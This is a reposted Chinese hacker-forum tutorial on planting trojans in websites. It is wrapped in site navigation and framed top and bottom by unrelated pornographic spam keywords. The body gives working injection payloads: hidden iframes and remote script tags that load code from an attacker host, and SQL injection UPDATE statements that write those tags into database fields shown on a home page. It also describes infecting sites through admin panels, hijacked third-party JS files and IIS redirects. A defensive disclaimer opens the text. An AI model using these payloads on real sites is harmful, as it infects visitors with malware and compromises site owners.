欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP

首頁(yè)

好書(shū)

留言交流

下載APP

聯(lián)系客服
[轉載]多姿多彩的網(wǎng)站掛馬方式 邪惡八進(jìn)制信息安全團隊技術(shù)論壇
[轉載]多姿多彩的網(wǎng)站掛馬方式

信息來(lái)源:黑客基地

--------------------------------------------------------------------------
先說(shuō)明一點(diǎn),不是怎么教大家掛馬,是讓你學(xué)會(huì )掛馬,怎么防守,怎么找馬,怎么找關(guān)鍵字,怎么讓你學(xué)會(huì )別人是通過(guò)什么方法掛到你的網(wǎng)站上的..
有利就有弊,隨便怎么看吧。
--------------------------------------------------------------------------

這里我拿掛首頁(yè)index.asp來(lái)舉例子。
  
  先說(shuō)一說(shuō),得到webshell的掛馬方法
  一般的掛馬的都是用框架,這是最基本的掛馬方式,只要不破壞原有的語(yǔ)言邏輯,那就想插入哪里就寫(xiě)哪里了,最基本的語(yǔ)句當然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中http://www.fucksb.net/mm.htm是我們的木馬,下面就不一個(gè)一個(gè)提示了。
 
  上面可能是一般的掛馬方式,也是初學(xué)者的玩法,好了,再說(shuō)深一點(diǎn)點(diǎn)的,那就是js文件,好多網(wǎng)站上,你查看源代碼都會(huì )調用js文件,其中的語(yǔ)句為<script language=javascript src=./ad/ad.js></script>,想到了什么,這里也可以?huà)祚R,其中我們可以遠程調用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>這個(gè)mm.js就可以寫(xiě)木馬了,怎么寫(xiě)呢,同樣,我們還用最基本的iframe框架,不過(guò)在<script></script>之中可識別語(yǔ)言不是html,那怎么辦呢,follow me,js文件可以這樣寫(xiě):document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,這種形勢,這時(shí)就可以執行此js中的代碼了,當然了,說(shuō)白了,其實(shí)全語(yǔ)句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

  聰明的你可能發(fā)現了一點(diǎn),好像不止是js文件哦~,只要在<script></script>之中,無(wú)論什么后綴的文件,只要里面寫(xiě)的語(yǔ)句可以被javascript識別就會(huì )執行,對的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后綴是什么,只要里面寫(xiě)的語(yǔ)句正確就會(huì )被執行了。

  同樣,如果首頁(yè)調用其它網(wǎng)站,或者次級目錄中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里掛馬,可以是htm和js,隨便哪種,這是比較隱蔽的玩法,這些適用于主頁(yè)沒(méi)有寫(xiě)權限的方法。

  <script>同<iframe>2個(gè)相比較,好處是script整體掛馬的代碼長(cháng)度比iframe小得多,很實(shí)用。說(shuō)實(shí)用是在數據庫方面,下面介紹。

    數據庫掛馬,這里我們拿mssql數據庫為例子。

  這里說(shuō)的是首頁(yè)調用到的數據庫,比如新聞,論壇,公告,等等,一般是標題。這些需要經(jīng)驗去檢測,舉個(gè)例子,比如首頁(yè)有一條新聞為:“明日開(kāi)業(yè)”,那么鼠標點(diǎn)此新聞,地址欄打開(kāi)的新窗口為news.asp?id=1,這種情況,這時(shí),就可以判斷此新聞是從數據庫中調用的了,當然了,我們不說(shuō)access,只說(shuō)mssql。
  首頁(yè),我們要有這個(gè)網(wǎng)站中的一個(gè)注入點(diǎn),比如就點(diǎn)在vote.asp?id=123,同時(shí),至少是Db_owner權限,這時(shí)如果要掛馬可以不用取到webshell,因為如果我們的目的只在于掛馬的話(huà),而且有時(shí),還得檢測mssql數據庫和web服務(wù)器不在同一個(gè)機器上,那掛馬的方式就是更改數據庫內容,這里我說(shuō)的就是這種,如上面說(shuō)的,首頁(yè)顯示的一條新聞標題為“明日開(kāi)業(yè)”,如果首頁(yè)顯示的標題是“明日開(kāi)業(yè)</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那這樣的話(huà),首頁(yè)就會(huì )執行這段代碼了,像這種情況,找到了注入點(diǎn),就得找表名,如此新聞的表名為news,字段為title,id,等等,根據猜測,id=1時(shí),暴出的字段title的值就為“明日開(kāi)業(yè)”,那么90%就可以猜到了,首頁(yè)調用的數據庫的字段就為news表中的title,這時(shí)在注入點(diǎn),可以大膽提交vote.asp?id=123;update news set title=‘明日開(kāi)業(yè)</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>‘ where id=1;--,這樣就可以更改數據庫了,前提是最少要少db_owner權限,當然也有時(shí)由于代碼原因,也可以這樣提交:vote.asp?id=123‘;update news set title=‘明日開(kāi)業(yè)</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>‘ where id=1 and ‘1‘=‘1,也可以...
  這種方法是有問(wèn)題的,實(shí)戰中存在不少問(wèn)題,因為一般的情況下,標題都是通過(guò)<table>來(lái)限制寬度,也就是說(shuō)如果你的標題的長(cháng)度超過(guò)了指定的長(cháng)度,那么你的代碼只能寫(xiě)一半,這樣就不能執行了,所以?huà)祚R最好的方法是用<script>這種方法來(lái)掛馬了,如:
vote.asp?id=123;update news set title=‘明日開(kāi)業(yè)</a><script src=http://www.fucksb.net/mm.js></script>‘ where id=1;--長(cháng)度有很大的減少,很不錯。
 
  后臺掛馬
  通常注入等不到webshell,就只能靠進(jìn)后臺掛馬。

  這里說(shuō)的是進(jìn)入了后臺,但不能通過(guò)后臺得到webshell,這時(shí)要仔細關(guān)察后臺,像比較網(wǎng)站的鏈接、頂部底部的廣告、都可以直接寫(xiě)入你的木馬代碼,等等,后臺是靈活的,具體問(wèn)題具體分析。不過(guò)有一點(diǎn)很重要,是不要打亂前臺htm源文件里的代碼邏輯,比如應該閉合前面的<a><img>"( 等這些符號,應該先閉合掉如</a></img>")。

  其它形式

  如一首頁(yè)調用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此種形勢,一樣可以在vote.asp中直接寫(xiě)入iframe木馬代碼,如果調用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp寫(xiě)代碼時(shí),請用document.write("")這種格式寫(xiě)入,當然,如果被掛文件中還有調用的文件可以繼續往深處寫(xiě),如果你夠狠的話(huà),直接寫(xiě)到數據庫配置文件中,如conn.asp,這樣好多頁(yè)面可以同時(shí)掛上你的一種木馬了。
  當然這里也有js文件,一樣原理。
  掛一個(gè)網(wǎng)站的馬,不一定就得攻入他,有時(shí)沒(méi)有方法的同時(shí),可以考慮跨站。好多站用了別的站的js文件,如:<script src=http://www.163.com/user.js>這種情勢,這時(shí)就可以考慮只拿163.com的權限就行了,只要能修改到user.js文件就可以?huà)斓侥阋獟斓恼军c(diǎn)了,同理,也有<iframe src=http://www.163.com/user.htm>此種情況,一樣道理,劍走偏鋒,達到目的,無(wú)論用什么招數了。
 
  服務(wù)器掛馬
  這里簡(jiǎn)單說(shuō)一個(gè)比較狠的吧.
  重定向任何調用的htm,js,等文件,只要是執行的如圖:



這種方法在計算中用搜索關(guān)鍵詞是搜索不到的,反正本地怎么找也找不到。。誰(shuí)能想到是在iis里設置的呢?而且調用文件那么多,怎么知道是重定向的那個(gè)文件呢?反正現在想不到有什么好方法可以解決,如果服務(wù)器如上圖被掛馬了,偶最好的建議是重裝IIS..^_^
本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
源碼
保護自己的源碼js禁止右鍵、復制(Ctrl C)、另存為、查看源文件
二行CSS代碼解決全部網(wǎng)頁(yè)script、iframe木馬其他
HTML在線(xiàn)編輯器的調用方法和使用方法詳解 - 遇見(jiàn)未來(lái)
超酷實(shí)用的天氣預報代碼匯總
News Article
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久